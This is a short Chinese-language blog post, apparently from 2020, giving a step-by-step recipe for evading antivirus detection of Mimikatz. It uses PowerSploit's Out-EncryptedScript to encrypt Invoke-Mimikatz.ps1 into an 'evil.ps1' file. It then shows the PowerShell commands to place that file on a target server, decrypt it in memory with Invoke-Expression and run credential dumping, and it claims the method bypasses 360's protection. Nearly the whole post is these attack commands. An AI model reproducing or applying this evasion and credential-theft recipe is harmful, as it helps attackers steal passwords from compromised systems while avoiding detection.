minikatz免杀之Out-EncryptedScript加密

Out-EncryptedScript加密

准备工作:PowerSploit下载

https://github.com/PowerShellMafia/PowerSploit

步骤

思路:利用Out-EncryptedScript.ps1把Invoke-Mimikatz.ps1进行加密

把Out-EncryptedScript.ps1与Invoke-Mimikatz.ps1放在一起

Out-EncryptedScript.ps1在ScriptModification目录下

Invoke-Mimikatz.ps1在Exfiltration目录下

进行加密

导入Out-EncryptedScript.ps1
Import-Module .\Out-EncryptedScript.ps1

进行加密

Out-EncryptedScript .\Invoke-Mimikatz.ps1 -Password 123 -Salt 123456

会在当前目录下生成evil.ps1文件,Password为密码 ,Salt为密钥

读取密码

把生成的evil.ps1放到目标服务器上,执行脚本:

[String] $cmd = Get-Content .\evil.ps1

Invoke-Expression $cmd

$decrypted = de password salt

Invoke-Expression $decrypted

Invoke-Mimikatz

过360主动被动

posted @ 2020-11-03 17:08  G0mini  阅读(665)  评论(0编辑  收藏  举报